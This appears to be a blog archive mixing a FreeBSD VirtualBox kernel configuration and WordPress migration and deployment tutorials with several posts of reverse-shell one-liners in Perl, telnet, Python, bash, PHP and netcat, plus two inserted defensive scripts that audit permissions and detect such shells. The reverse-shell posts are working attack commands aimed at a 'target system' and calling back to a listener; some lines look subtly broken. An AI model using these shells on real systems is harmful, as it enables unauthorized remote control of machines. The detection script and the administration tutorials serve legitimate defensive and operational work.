If you were a regular visitor before, you’ll recognize this. This is the configuration I was using to build out a new version of BSDeviant. Sadly, that project was tabled for now. UnixPunx just doesn’t seem to want to breathe again. Oh well, moving on.

FreeBSD Kernel Configuration for VirtualBox Guests

cpu             HAMMER
ident VBOX

options SCHED_ULE # ULE scheduler
options PREEMPTION # Enable kernel thread preemption
options INET # InterNETworking
options INET6 # IPv6 communications protocols
options IPSEC # IP (v4/v6) security
options TCP_OFFLOAD # TCP offload
options SCTP # Stream Control Transmission Protocol
options FFS # Berkeley Fast Filesystem
options SOFTUPDATES # Enable FFS soft updates support
options UFS_ACL # Support for access control lists
options UFS_DIRHASH # Improve performance on big directories
options UFS_GJOURNAL # Enable gjournal-based UFS journaling
options QUOTA # Enable disk quotas for UFS
options NFSCL # Network Filesystem Client
options NFSD # Network Filesystem Server
options NFSLOCKD # Network Lock Manager
options NFS_ROOT # NFS usable as /, requires NFSCL
options CD9660 # ISO 9660 Filesystem
options PROCFS # Process filesystem (requires PSEUDOFS)
options PSEUDOFS # Pseudo-filesystem framework
options GEOM_PART_GPT # GUID Partition Tables.
options GEOM_LABEL # Provides labelization
options COMPAT_FREEBSD32 # Compatible with i386 binaries
options SYSVSHM # SYSV-style shared memory
options SYSVMSG # SYSV-style message queues
options SYSVSEM # SYSV-style semaphores
options _KPOSIX_PRIORITY_SCHEDULING # POSIX P1003_1B real-time extensions
options PRINTF_BUFR_SIZE=128 # Prevent printf output being interspersed.
options KBD_INSTALL_CDEV # install a CDEV entry in /dev
options HWPMC_HOOKS # Necessary kernel hooks for hwpmc(4)
options AUDIT # Security event auditing
options CAPABILITY_MODE # Capsicum capability mode
options CAPABILITIES # Capsicum capabilities
options MAC # TrustedBSD MAC Framework
options INCLUDE_CONFIG_FILE # Include this file in kernel
options RACCT # Resource accounting framework
options RACCT_DEFAULT_TO_DISABLED # Set kern.racct.enable=0 by default
options RCTL # Resource limits

# Make an SMP-capable kernel by default
options SMP # Symmetric MultiProcessor Kernel

# CPU frequency control
device cpufreq

# Bus support.
device acpi
options ACPI_DMAR
device pci
options PCI_IOV # PCI SR-IOV support

# ATA controllers
device ahci # AHCI-compatible SATA controllers
device ata # Legacy ATA/SATA controllers
options ATA_STATIC_ID # Static device numbering

# ATA/SCSI peripherals
device scbus # SCSI bus (required for ATA/SCSI)
device da # Direct Access (disks)
device cd # CD
device pass # Passthrough device (direct ATA/SCSI access)
device ses # Enclosure Services (SES and SAF-TE)
#device ctl # CAM Target Layer

# atkbdc0 controls both the keyboard and the PS/2 mouse
device atkbdc # AT keyboard controller
device atkbd # AT keyboard
device psm # PS/2 mouse

device kbdmux # keyboard multiplexer

device vga # VGA video card driver
options VESA # Add support for VESA BIOS Extensions (VBE)

device splash # Splash screen and screen saver support

# syscons is the default console driver, resembling an SCO console
device sc
options SC_PIXEL_MODE # add support for the raster text mode
# vt is the new video console driver
device vt
device vt_vga
device vt_efifb

device agp # support several AGP chipsets

# PCI Ethernet NICs.
device em # Intel PRO/1000 Gigabit Ethernet Family

# Pseudo devices.
device loop # Network loopback
device random # Entropy device
device rdrand_rng # Intel Bull Mountain RNG
device ether # Ethernet support
device vlan # 802.1Q VLAN support

# The `bpf' device enables the Berkeley Packet Filter.
# Be aware of the administrative consequences of enabling this!
# Note that 'bpf' is required for DHCP.
device bpf # Berkeley packet filter

# USB support
device uhci # UHCI PCI->USB interface
device ohci # OHCI PCI->USB interface
device ehci # EHCI PCI->USB interface (USB 2.0)
device xhci # XHCI PCI->USB interface (USB 3.0)
device usb # USB Bus (required)
device ukbd # Keyboard
device umass # Disks/Mass storage - Requires scbus and da
# VirtIO support
device virtio # Generic VirtIO bus (required)
device virtio_pci # VirtIO PCI device
device vtnet # VirtIO Ethernet device
device virtio_blk # VirtIO Block device
device virtio_scsi # VirtIO SCSI device
device virtio_balloon # VirtIO Memory Balloon device

# Netmap provides direct access to TX/RX rings on supported NICs
device netmap # netmap(4) support

# The crypto framework is required by IPSEC
device crypto # Required by IPSEC

2020-07-24T10:31:33-04:00 | April 16th, 2020 | Categories: Engineering

One of the Best Ways to Migrate WordPress

I’m going to show you how easy it is to migrate WordPress using only the command line. It is just as simple as installing it, in the first place. If you followed the tutorial on deploying wordpress from terminal successfully, you’ll have no trouble with this one.

Migrate WordPress from the Terminal

To be honest, unless you’re using the kick ass wp-cli tool, I’ve found that it’s easiest, and fastest, to use the command line to migrate WordPress. There’s no fiddling about with random plugins that’ll clutter up your database and bother you otherwise. And, in the end, it’s really only a few commands.

All we need to do is make sure we have all of the files and the file structure intact, as well as the database. If you’re moving from one domain name to another, you may need to find and replace in the database, everywhere your origin domain exists with your destination domain. Or, you could just update the website’s settings with your destination domain prior to performing the migration.

We’ll touch on fixing the configuration, if you forgot to update your domain before the migration, at the end.

Zip and Grab the WordPress Files

Go ahead and SSH into the machine hosting WordPress that you plan to migrate and zip up the entirety of the wordpress directory.

ssh <source host>
cd /var/www/html
# zip the directory itself (.) so dotfiles such as .htaccess are included
sudo zip -r wordpress-backup.zip .
sudo mv wordpress-backup.zip ~
compress files into a zip archive for a wordpress migration
zip -r target-zip-file.zip $path

You’ll see a lot of spam fly by as zip recursively compresses all of the files in preparation for our WordPress migration. Finally, I move the zip archive back to my user directory, where all that’s left for that part is to change the ownership to my user and pull it down. But, we still need the database or we won’t have anything for users or content or anything that matters.

Saving the WordPress Database for Migration

# work from the home directory so the dump is not written into the web root
cd ~
sudo mysqldump -u wp_db_user -p wp_database > wordpress-database-backup.sql
Password:
sudo chown mootiny:mootiny wordpress-database-backup.sql
sudo chown mootiny:mootiny wordpress-backup.zip
extracting a SQL database for a WordPress migration
mysqldump backs dat ass up

Migrating the WordPress Website to the New Host

Now migrate your files to your new host. In case you haven’t noticed, this is exactly how you’d perform disaster recovery on a WordPress website that’d been compromised or suffered a hardware failure or anything else catastrophic. As well, it’s not far from manually deploying WordPress from the terminal either.

migrating wordpress files to a new host using sftp
put’n those files where they belong

Go ahead and use SFTP (which comes bundled with OpenSSH) to connect to your new host and transfer your backup for restoration and recovery.

sftp <destination host>
put wordpress-database-backup.sql
put wordpress-backup.zip

Now we simply extract the WordPress files on their new host. Then we will fix the file permissions, create an empty database and database user, and restore the SQL database at its new home.

creating a mariadb database and user, then granting the user access to the database, while manually performing a wordpress migration using only the terminal
creating the wordpress database and user for a wordpress migration (from terminal)

Change directories to webroot (if that’s where you want WordPress to live). Extract the files and proceed to log into the SQL server.

cd /var/www/html
sudo unzip ~/wordpress-backup.zip

Next we connect to our MariaDB server and create a shell for our WordPress website to move into.

sudo mysql -u root -p
Password:
MySQL> create database wp_database;
MySQL> grant all privileges on wp_database.* to 'wp_db_user'@localhost identified by 'wp_db_password';
MySQL> flush privileges;
MySQL> quit;

Now that we have a skeleton in place, all we need to do is restore the SQL content by populating the database with a quick one-liner and fix the file permissions and we’re golden!

mysql -u wp_db_user -p wp_database < wordpress-database-backup.sql

Setting the Correct Permissions after our WordPress Migration

restoring the WordPress database to MariaDB server and fixing the file permissions for a wordpress migration
fixing file permissions
chown -R www-data:www-data /var/www/html
find /var/www/html -type d -exec chmod 755 {} \;
find /var/www/html -type f -exec chmod 644 {} \;

And you’re done, browse to your new host and login through the web interface, like normal. :)

migrating wordpress from the terminal is successful!
ta-da!

2020-07-24T10:31:57-04:00 | April 15th, 2020 | Categories: Engineering

A Perfect WordPress Deployment using the Terminal

How to Manually Perform a WordPress Deployment

I’m going to walk you through a WordPress deployment, using only the terminal. This is mostly because I need to put some content up here. And, once upon a time, this used to be one of my staple articles. Nothing has changed, really. But, I will reiterate the fact that you really should know how to do things manually, before you start plowing ahead and automating them.

Automation is good, it’s absolutely necessary, even. But, when things break, it’s best that you’re able to figure out how it happened. And, the easiest way to obtain that information is, sadly, the hard way.

WordPress being so evolved.. Please do not expect a WordPress deploy to be something you can’t handle. Deploying WordPress is very straightforward. So, let’s get started.

virtual guest linux debian in a vagrant
Linux Debian 9 as a vagrant guest

LAMP: Linux, Apache, MySQL and PHP

WordPress runs very well on almost any web server. But, for the purposes of sticking to the documentation, we’re going to use Apache (not that I always stick to the documentation, mind you). You should familiarize yourself with a “LAMP” deployment anyway, it’s pretty much what powers the entire internet. Please note that MySQL is often replaced with either MariaDB or Percona Server. I won’t go into the differences here.

Go ahead and SSH into your web server, update your software repository and do a full system upgrade. There’s no reason to deploy LAMP without the latest patches. I’m using debian, so your commands may be slightly different for these types of things. Refer to your distribution’s handbook, if you need to.

sudo apt update
sudo apt dist-upgrade
sudo apt install apache2 mariadb-server php-fpm

Enable the Necessary Apache Modules

Hah! Before, that required us grabbing a whole lot more packages than it does these days. But, don’t worry! We will still need to go get various PHP libraries for our WordPress deploy to be successful (specifically, for it to interact with mariadb). Still, you don’t need to do anything else there on Debian, unless Apache was previously configured with libapache2-mod-php. Then go ahead and issue the following (unexplained):

sudo a2dismod php7.3        # Debian names the mod_php module after its version
sudo a2dismod mpm_prefork
sudo a2enconf php7.3-fpm    # at time of writing, 7.3 was stable
sudo a2enmod mpm_event fcgid cgi proxy_fcgi setenvif rewrite
sudo systemctl restart apache2
using terminal to swap apache modules for a manual wordpress deploy
Configure Apache

There’s plenty of other Apache modules that are beneficial for WordPress, but we’re just doing a deploy right now.

Prepare MariaDB for Production

I’m pretty sure that we all knew MySQL shipped with insecure defaults for many years. So, I have no idea, why this tradition has carried through to MariaDB. But, it’s my opinion, that we should damn not be having to still do this bit here. But, set a root password for the SQL db. And, disable remote access. Run ‘mysql_secure_installation’, press Y to everything and set a password.

Install the Minimum PHP Requirements

As I just said about Apache, there’s also plenty of PHP libraries that will benefit WordPress, but they’re beyond the scope of this walk through. So, we’re only going to grab what WordPress requires to install without complaint, as well as what is required to return a green health check.

sudo apt install php-mysql php-gd php-bz2 php-curl php-zip php-xml php-gmp php-intl php-mbstring php-xmlrpc php-token-stream php-mcrypt
manual wordpress deploy, installing required php modules
install php modules

I, honestly, don’t know what to tell you about PHP modules. Depending on your linux distribution, your PHP package is going to come with different modules. There’s really no telling what was bundled with it and what wasn’t. If you’re on Debian, this will get WordPress up and running, at least. But, on others, the packages will be named differently anyway. So, try to reach this minimum.

WordPress Deployed from Terminal

On Debian, Apache’s default “webroot” is in /var/www/html . Your “webroot” may be in a different location. If you don’t know, check your Apache configuration. It should be located in /etc/apache2 or /etc/httpd – The filename would either be apache2.conf or httpd.conf

Anyway, back to manually deploying WordPress from the terminal. I’ll have to clean this up later. But, for now, I’ll just finish what I started. Jump on over to webroot, grab the latest version from wordpress.org and extract it. All that’s left after that is to create a user for “MySQL”, set permissions and run the installer.

cd /var/www/html
wget https://wordpress.org/latest.zip
unzip latest.zip
quite literally deploying wordpress into a folder, out of compressed zip file
extract wordpress

Note: this next part you can ignore. What I am doing is deleting my webroot and moving the folder wordpress extracted to in place of my webroot. If you extracted wordpress into ./html/ then you don’t need to do this.

rm -rf ./html/
mv ./wordpress/ ./html/

Create a MySQL Database, a MySQL User, Marry Them

Now we need to create a MySQL database, create a MySQL user and grant it privileges to write to the database. Then, fix the file permissions and we’re done with the terminal (the website is technically up, at that point).

mysql -u root -p    # perhaps prefix with sudo, if you're not root
mysql> create database wordpress;
mysql> grant all privileges on wordpress.* to 'wordpress'@localhost identified by 'p@ssword';
mysql> flush privileges;
mysql> quit
grant all privileges on WordPress Deploy to Deploy@WordPress identified by 'ASSWORD'
Identified by assword?!

Let’s set some privileges. First, give the user that runs Apache ownership of the files. Then set the directories to 755: read/write/execute for Apache’s user, read/execute for its group and everyone else. Finally, set the files to 644: read/write for Apache’s user and read-only for everyone else (since php-fpm needs to read and run them).

Fix File Permissions and Be Done!

chown -R www-data:www-data /var/www/html
find /var/www/html -type d -exec chmod 755 {} \;
find /var/www/html -type f -exec chmod 644 {} \;
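
One way to check the result of those three commands, as an added example that is not part of the original post: the function names are hypothetical, the owner defaults to the www-data account used above, and the sample tree is constructed. Besides the 755/644 layout it flags world-writable entries and a world-readable wp-config.php, which the 644 pass leaves in place.

```shell
#!/bin/sh
# Added example: audit a WordPress tree against the owner/755/644 layout.

# tag LABEL: prefix every path read on stdin with LABEL and a tab.
tag() { while IFS= read -r p; do printf '%s\t%s\n' "$1" "$p"; done; }

# audit_webroot ROOT OWNER
# Prints one "finding<TAB>path" line per deviation; returns 1 if any were found.
audit_webroot() {
    root=$1; owner=$2
    findings=$(
        # Entries not owned by the web server account.
        find "$root" ! -user "$owner" | tag wrong-owner
        find "$root" -type d ! -perm 755 | tag dir-not-755
        # wp-config.php is exempt here so that tightening it is not reported.
        find "$root" -type f ! -name wp-config.php ! -perm 644 | tag file-not-644
        # World-writable entries let any local account plant or alter PHP code.
        find "$root" \( -type f -o -type d \) -perm -002 | tag world-writable
        # wp-config.php holds the database password; o+r exposes it to every local user.
        find "$root" -type f -name wp-config.php -perm -004 | tag wp-config-world-readable
    )
    if [ -z "$findings" ]; then
        return 0
    fi
    printf '%s\n' "$findings"
    return 1
}

# make_sample_tree: build a small constructed WordPress-like tree, print its path.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/wp-content/uploads"
    : > "$t/index.php"
    : > "$t/wp-config.php"
    chmod 755 "$t" "$t/wp-content"
    chmod 777 "$t/wp-content/uploads"    # deliberately too open
    chmod 644 "$t/index.php" "$t/wp-config.php"
    printf '%s\n' "$t"
}

if [ $# -ge 1 ]; then
    # Usage: sh audit.sh /var/www/html [owner]
    audit_webroot "$1" "${2:-www-data}" || echo "findings listed above" >&2
else
    # No argument: run against the constructed sample tree.
    sample=$(make_sample_tree)
    audit_webroot "$sample" "$(id -u)" || true
    rm -rf "$sample"
fi
```

On the sample tree it reports the uploads directory twice (not 755, world-writable) and wp-config.php once; after `chmod 755` on uploads and `chmod 640` on wp-config.php it reports nothing.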

At this point, we really need to bust out our browser and complete the install, so we can prevent about a billion zombies from hammering away at our install script and owning the box (just log password attempts on WordPress for a week and you’ll see what I mean). So get your browser out and finish this bitch off! You’re done.

Good luck. Have fun! And, next map. If you’d like this handled for you, drop me a line at Gray Hat Freelancing!

wordpress initial configuration - final step of wordpress deployment
Porky Pig

FIN – Our Job Here is Done

There’s plenty more to do. Especially from a security standpoint. I can tell you right now, our file permissions are decent but not perfect. There’s optimizations that need to be made or your blog could become a zombie in a DDoS, etc.. But, those are for another article. For now, enjoy the WordPress deploy!

wordpress has been deployed - hello world
Hello World!
deploying wordpress - do the speak english in wordpress deployment?
Self-explanatory
wordpress database configuration - almost done with wordpress deployment
@ssword

2020-07-24T10:32:56-04:00 | April 10th, 2020 | Categories: Engineering

Jeet Kune Crypto: Powerful Perl Reverse Shells

Let’s spawn a few perl reverse shells, in various environments. Why? Because Perl is that diverse.

 

Perl Reverse Shells

 

If you’re just getting into writing code, python comes heavily recommended. But, if code auditing is something you’re wanting to get into, jumping straight into perl might be more beneficial. And, yes, these are all built to be executed on a single line.

 

A linux reverse shell using /bin/sh

 

perl -e 'use Socket; $i="172.16.16.5"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S");open(STDOUT,">&S"); open(STDERR, ">&S"); exec("/bin/sh -i");};'

 

perl reverse shell connecting back to ncat
perl reverse shell connecting back
ncat listening for the perl reverse shell to connect
ncat listening and accepting

 

A Windows reverse shell using Perl

 

It’s actually not uncommon to find perl installed on Windows Servers

 

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);$_ while<>;'

 

Perl reverse shell without using /bin/sh

 

Perl is so versatile that we can do some amazing things with it. Watch us spawn a reverse shell without using a binary!

 

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

 

Feel free to comment, if you’ve got some more reverse shells. We do have moderation enabled, but we’re pretty lenient with the content here, at Gray Hat Freelancing.

2020-07-24T10:52:59-04:00 | April 6th, 2020 | Categories: Jeet Kune Crypto, One Liners

Jeet Kune Crypto: Telnet Reverse Shells are Devastating

Reverse shells communicate in plaintext, by default. Telnet isn’t often installed by default any more. But, if it does exist on your target system, here are two one liners you can use to spawn a reverse shell with telnet.

Telnet Reverse Shells are Easy

rm -rf /tmp/p; mknod /tmp/p p && telnet 172.16.16.1 1234 0/tmp/p
telnet reverse shells
ugh… telnet

Another Simple Telnet Connect-Back Shell

telnet 172.16.16.1 1234 | /bin/bash | telnet 172.16.16.1 1235

As usual, in these reverse shell scenarios, your IP is 172.16.16.1 and your port is 1234. Telnet should be piped through an encrypted tunnel, unless you don’t mind people snooping on you.

2020-07-13T17:39:58-04:00 | April 6th, 2020 | Categories: Jeet Kune Crypto, One Liners

More One Line Reverse Shells

Jeet Kune Crypto: One Line Reverse Shells with Scripting Languages

Reverse shells are extremely useful for subverting firewalls or other security mechanisms that may block newly opened ports. Often you’ll find hosts already have several scripting languages installed. We’re going to take advantage of some of the most popular of those languages, to spawn a reverse shell.

In these scenarios, your listening IP is 172.16.16.1 and your listening port is 1234.

Python Reverse Shell:

This python one line reverse shell is kind of a trip. Trust me, nobody expects you to remember this one, off of the top of your head.

python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("172.16.16.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

BASH Reverse Shell:

This one is simple. Everyone expects you to remember something like this, off of the top of your head.

bash -i >& /dev/tcp/172.16.16.1/1234 0>&1

PHP Reverse Shell:

From terminal:

php -r '$sock=fsockopen("172.16.16.1",1234);exec("/bin/sh" -i <&3 >&3 2>&3");'

 

2020-07-13T17:31:40-04:00 | April 6th, 2020 | Categories: Jeet Kune Crypto, One Liners

Jeet Kune Crypto: netcat (reverse shells)


One of the most useful TCP/IP tools, for network and systems engineers, is netcat. Netcat is commonly referred to as the “TCP/IP Swiss Army Knife”. It is often flagged as malware or a “potentially unwanted program” by anti-malware software.

While traditional backdoors wait for you to connect (which netcat can also do), here are a few ways that you can use it as a “reverse shell”, or a backdoor that connects back to you:

Versions that support "-e":
Linux:
nc -e "/bin/sh" <target> <target port>
Windows:
nc -e "cmd.exe" <target> <target port>

If the version of netcat that you’re using does not support “-e”, you’ll want to create a network socket out of a file. You can “hack” up a network socket on linux, like so:

mkfifo /tmp/socket;cat /tmp/socket|/bin/sh -i 2>&1|nc <target> <target port> > /tmp/socket

If you’re using netcat to listen for the incoming connection, you’d prepare to receive this type of connection like so:

nc <host> <port>
or for a range of ports
nc <host> <starting port>-<ending port>
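
Seen from the defending side, the one-liners in this post and in the Perl, telnet and scripting-language posts above all leave a recognizable process command line. The following is an added example, not code from the original posts: it flags those shapes in a process-execution log, and the rule names, the log format and the 192.0.2.x sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: match process command lines against the reverse-shell
# shapes described in these posts. Rule names are hypothetical.

# has PATTERN: true when $line (set by the caller) matches the extended regex.
has() { printf '%s\n' "$line" | grep -Eq -- "$1"; }

# classify_cmdline LINE: print the first matching rule name, return 1 if none.
classify_cmdline() {
    line=$1
    # A shell with its descriptors redirected to bash's /dev/tcp pseudo-device.
    if has '/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'; then
        echo bash-dev-tcp; return 0
    fi
    # netcat started with -e; the token boundary keeps "rsync -e ssh" out.
    if has '(^|[[:space:]/;|&])(nc|ncat|netcat)[[:space:]]+([^|;&]*[[:space:]])?-[A-Za-z]*e([[:space:]]|$)'; then
        echo netcat-exec; return 0
    fi
    # A named pipe created and wired to nc or telnet in the same command.
    if has '(mkfifo|mknod)[[:space:]]' &&
       has '(^|[[:space:]|;&])(nc|ncat|netcat|telnet)[[:space:]]'; then
        echo fifo-relay; return 0
    fi
    # telnet | shell | telnet relay.
    if has 'telnet[[:space:]][^|]*[|][[:space:]]*(/bin/)?(ba)?sh[^|]*[|][[:space:]]*telnet[[:space:]]'; then
        echo telnet-relay; return 0
    fi
    # Interpreter one-liner that opens a socket and also runs or rebinds a shell.
    if has '(^|[[:space:]/])(perl|python[0-9.]*|php)[[:space:]]+-(e|c|r|M)' &&
       has '(Socket|socket\.socket|fsockopen)' &&
       has '(/bin/(ba)?sh|cmd\.exe|dup2|fdopen|system|exec)'; then
        echo script-socket-shell; return 0
    fi
    return 1
}

# scan_log: read log lines on stdin, print "rule<TAB>line" for every hit.
scan_log() {
    while IFS= read -r entry; do
        if rule=$(classify_cmdline "$entry"); then
            printf '%s\t%s\n' "$rule" "$entry"
        fi
    done
}

# sample_log: constructed process-execution log (abbreviated command lines).
sample_log() {
    cat <<'EOF'
2020-04-06T10:00:01 web01 uid=33 cmd: bash -i >& /dev/tcp/192.0.2.10/1234 0>&1
2020-04-06T10:00:02 web01 uid=33 cmd: nc -e /bin/sh 192.0.2.10 1234
2020-04-06T10:00:03 web01 uid=33 cmd: mkfifo /tmp/socket;cat /tmp/socket|/bin/sh -i 2>&1|nc 192.0.2.10 1234 > /tmp/socket
2020-04-06T10:00:04 web01 uid=33 cmd: telnet 192.0.2.10 1234 | /bin/bash | telnet 192.0.2.10 1235
2020-04-06T10:00:05 web01 uid=33 cmd: perl -e use Socket; ... exec("/bin/sh -i");
2020-04-06T10:00:06 web01 uid=33 cmd: python -c import socket,subprocess,os; s=socket.socket(...); os.dup2(s.fileno(),0); ...
2020-04-06T10:00:07 web01 uid=33 cmd: php -r $sock=fsockopen(...); exec(...);
2020-04-06T10:01:00 web01 uid=0 cmd: rsync -a -e ssh /var/www/html backup@192.0.2.30:/srv/
2020-04-06T10:01:01 web01 uid=1000 cmd: nc -zv 192.0.2.20 443
2020-04-06T10:01:02 web01 uid=1000 cmd: python3 -c import json,sys; print(json.load(sys.stdin)["version"])
2020-04-06T10:01:03 web01 uid=1000 cmd: mkfifo /var/run/app.fifo
EOF
}

sample_log | scan_log
```

The first seven constructed lines are flagged and the last four (rsync with -e, a port check, a JSON one-liner, a plain mkfifo) are not. Patterns like these catch the literal shapes only, so they belong beside egress filtering and process-lineage alerts (a web server account spawning an interactive shell) rather than in place of them.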

2020-06-19T12:24:43-04:00 | April 5th, 2020 | Categories: Jeet Kune Crypto, One Liners